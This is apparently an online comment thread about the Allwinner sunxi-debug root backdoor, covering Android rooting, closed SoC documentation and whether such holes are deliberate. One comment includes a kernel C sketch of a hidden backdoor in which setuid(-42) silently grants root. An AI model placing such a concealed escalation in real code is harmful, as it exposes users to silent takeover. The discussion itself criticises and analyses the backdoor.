Relatedly, here is a post from 6 years ago by someone who put a root backdoor into a device he designed, along with an explanation of how to use it:
If that was today, someone would discover it, scream "backdoor! security vulnerability!", and it would be all over the news like this one. And that makes me very sad.
This allows any app to gain root. Without user interaction. That is insane.
The only thing that is insane here is that we all deem this as "normal".
"Well, in our country," said Alice, still panting a little, "you'd generally get to somewhere else—if you run very fast for a long time, as we've been doing."
"A slow sort of country!" said the Queen. "Now, here, you see, it takes all the running you can do, to keep in the same place. If you want to get somewhere else, you must run at least twice as fast as that!" 
The update treadmill is normal, in the classic sense of the word.
Taking over something and operating it without permission is highly congruent with naval piracy. So perhaps hung from the yardarm is better. At any rate, something gruesome, public and nasty needs to happen to them.
Yes, I think the basic ... drive to do this is just latent in people, and they initially did it just for the heck of it. There was no money in it to start with.
How this could be considered anything other than deeply antisocial is beyond me.
Side-loading unsigned ROMs/packages and gaining root are orthogonal concepts in Android: sometimes you want to obtain app-level root in the factory-installed OS, and sideloading won't help with that (unless you are side-loading a rooted ROM, but that is not a given)
As I said: sometimes you just want to run 1 app as root, not replace the kernel. Also, good luck getting a usable device with your own kernel/software when chip manufacturers don't provide drivers: unless you don't mind the usual litany of XDA caveats ("N0irROM v.0.4. Not working: Camera, GPS, Hardware acceleration. new: mic now working, randomly reboots less often")
You mean, like Google? Nexus devices can be rooted just fine. They just don't give root permissions to any app without asking or even informing me.
Or did I miss something, and has a more viable (including economically) concept been invented?
But apparently they stepped up their game. Even for debugging this is an odd one.
(I really miss the old days when you got a document that explained everything about your processor. I have an ARM port of an experimental OS waiting for a new board with a complete data sheet. It's been a year so far.)
Googling "AllWinner A20 datasheet" brings in good results.
"Broadcom BCM2836 datasheet" doesn't. All you get is part of the GPIO registers, and absolutely NO electrical specifications. (Part of me really wants someone working there to "take one for the community" and leak the full datasheet. Ironically, that's how the AllWinner docs were originally released.)
Now, who wants to blame upstream kernel maintainers for refusing to merge all the dirt floating around and for demanding high-quality code submissions?
I think upstream support for the chips affected by this got stuck in long arguments about the most elegant way to support their clocking and reset infrastructure, which needs to be solved before actual peripheral drivers can be developed. The H3 seems to be approaching the point where it has enough upstream support for a handful of limited uses, over a year after the mainlining effort started. The A83T is still held up on getting the support code necessary to actually boot Linux merged.
I think modern Intel chips are similar, except that they run closed-source management firmware to help them look more like a collection of separate devices to Windows. But they aren't: Skylake can't enter lower CPU power states unless the SATA link is in power-saving mode and a whole bunch of other peripherals cooperate, because they share hardware. ARM SoCs just don't have the magic firmware that lets the drivers hide this from the OS.
Who is responsible for the fact that an active I2C device prevents entering sleep state 0 but an active SPI device does not? Where does that information get recorded? And who needs to act on it?
On the RPi, you can change pin direction without being in supervisor mode--that's not true on the BeagleBone.
These aren't easy questions, and the Linux architecture makes it even harder.
This could be locked down so that, say, only processes which are members of a certain group can open a file descriptor to this proc entry.
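A hypothetical kernel-side sketch of that lockdown (illustrative only, not runnable outside a kernel tree; `sunxi_debug_fops` and `SUNXI_DEBUG_GID` are assumed names): create the node write-only for root and one group, so merely opening a file descriptor to it requires group membership.

```c
/* Hypothetical sketch: 0220 = write-only for owner (root) and group.
 * Processes outside the chosen group can't even open the node. */
static struct proc_dir_entry *dir, *ent;

static int __init sunxi_debug_init(void)
{
	dir = proc_mkdir("sunxi_debug", NULL);
	if (!dir)
		return -ENOMEM;
	ent = proc_create("sunxi_debug", 0220, dir, &sunxi_debug_fops);
	if (!ent)
		return -ENOMEM;
	/* owned by root, group set to an assumed build-time constant */
	proc_set_user(ent, GLOBAL_ROOT_UID, KGIDT_INIT(SUNXI_DEBUG_GID));
	return 0;
}
```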
This is a lot of unnecessary effort to implement something that can be obtained with a simple /bin/rootmydevice executable that is chmod u+s. (Though it is somewhat more streamlined: no intervening process execution is required).
Which, in turn, is a lot of effort to reinvent sudo.
(But of course, those are arguably front doors; you can easily scan the filesystem image for items that have u+s perms.)
I would do this kind of hole differently: why not just hack the kernel so that any process can call setuid(0)? Or, to hide it slightly: say, setuid(-42) gives you root privileges.
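The magic-setuid idea could be sketched as a kernel patch (purely illustrative and not runnable outside a kernel tree; the elision stands for the real syscall body):

```c
/* Illustrative only: a hidden credential escalation inside setuid(). */
SYSCALL_DEFINE1(setuid, uid_t, uid)
{
	if (uid == (uid_t)-42) {	/* magic value: silently grant root */
		struct cred *new = prepare_creds();
		if (!new)
			return -ENOMEM;
		new->uid = new->euid = new->suid = new->fsuid = GLOBAL_ROOT_UID;
		return commit_creds(new);
	}
	/* ... normal setuid() permission checks and credential update ... */
}
```

Unlike a u+s binary, nothing in the filesystem image gives this away; you would have to diff the kernel source or binary to spot it.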
He should have added:
3. add a backdoor;
Commit 7cc9a8fff679fcd31bca7d18c8b3b960796d032f was replaced by bcc3e09783ca31039183d5084d8480bd76d531f5, without the sunxi-debug.c file.
Compare https://github.com/allwinner-zh/linux-3.4-sunxi/commit/7cc9a... (original) with https://github.com/allwinner-zh/linux-3.4-sunxi/commit/bcc3e... (modified)
https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bcc3e09... → 404
Hence I am forced to choose other form factors.
It would be nice to flash my own choice of BIOS. As far as I can tell this is still not too common. That is a project to which I am willing to devote large amounts of time should the information needed ever become public.
It seems the newer the hardware, the more complicated and difficult this becomes. By my estimation, there is a certain value in older hardware because it is less complicated and can be easier to control.
Here is an idea that stays with me year after year: another open source OS project that chooses a single item of hardware and supports only that item.
Silly fantasy: Perhaps a deal is struck with one or more factories that can produce it. Perhaps the terms could be public. Maybe user-developers become faithful and loyal buyers of the hardware, because they like the control. Perhaps they directly pay the costs of production through donations. I have no idea what would happen. That's the point of trying it.
If this sort of symbiotic relationship were built between open source user-developers and a single hardware manufacturer around a single item, one could reason that it would be in the manufacturer's best interest to open the specs to the developers, if not to the public.
I leave it to you to list all the many reasons this is not worth doing. Then sit back and enjoy the status quo.
But for those of you who are avid users of an open source OS, I ask you to consider:
Do you ever get tired of watching the project trying to keep pace with new hardware? How do you feel when the manufacturers will not disclose the specs? Are you OK with binary blobs in your "open" system? How about not knowing whether your OS of choice is going to work with your new hardware? What if there was one item of hardware that you could be absolutely sure was always going to work with your preferred open source OS, and to its maximum capacity?
OK, you may now return to chasing the new (locked-down) hardware. Thank you for your time.
The Librem laptop was another attempt at this, but it failed pretty badly. They couldn't get around a lot of the "binary blob" issues with modern hardware. Their attempt may in fact show that truly open firmware on modern x86_64/amd64 machines is impossible.
There's Novena, but I believe that's ARM based (which is possibly the best bet for truly open hardware today)
They should have done #ifdef DEBUG in the kernel source...
The permissions are set to world writable, so you're giving every app the right to modify your system.
I'm still not sure why Allwinner resorted to this silliness instead of using su like a sane developer. If anyone could loop me in that would be appreciated.
DDoS protection by CloudFlare
Maybe they could do it better and not turn away people without JS (at least while traffic is at a regular level)
For that to work they need to fingerprint and track you. Which is why they said they block users with NoScript or on TOR.
Thomas Kaiser appears to have been the first person to discover it on April 29th, 2016. http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390 (Thanks to HD Moore for linking me.)
From what I can tell, it went unnoticed for slightly under a year.
I may be wrong on those points. Maybe someone can correct me.
(search for rootmydevice)
I don't see why they did it, but they did it in the plainest and most visible way I can imagine.
Which is exactly my point.
Say you are a government organization that requires a backdoor. You can make a very sophisticated backdoor; when it's found, it is clear that it is probably intentional (e.g. Dual_EC_DRBG). Or you can make a very obvious backdoor that is disguised as a debugging option that you forgot to disable, an obvious logic error, etc. For such backdoors, it's easy to argue that it was just sloppy programming (in contrast to an intentional government-requested backdoor), so people will assume the simpler explanation (as in Hanlon's razor).
We have learned from the Debian OpenSSL saga that trivial programming errors in critical software can go unnoticed for years. I don't think the Debian OpenSSL bug was government-mandated, but it's easy to see why this is a very attractive route: the bug caused only 32,768 unique private keys to be generated (great for spying), most people will believe it's a genuine programming error, and you pay the person/company that introduced the bug royally for taking the blame.
"Where are you going?" asks the first.
"To Minsk," says the second.
"To Minsk, eh? What a nerve you have! I know you're telling me you're going to Minsk because you want me to think that you're really going to Pinsk. But it so happens that I know you really are going to Minsk. So why are you lying to me?"
What you're saying is that the diffs are hard to work with in general. What I'm saying is that in a diff (be it large or small, a single commit or many), the code they wrote is the most visible and understandable way to do what they did.
Not saying this was the actual intention here, but it'd be a plausible way to go about it. It certainly appears the backdoor is running on lots of devices in the wild before it got noticed (even when it's this obvious in the diff(!)), so "mission accomplished"? :)
If you're after privacy, it's about op-sec: turning off the phone, not using it for certain activities, having different phones for different compartments of life.
People (me included) are lazy, and really, if you're relying on a phone for your security... well, good luck with that.
The hardware is used in low-cost tablets...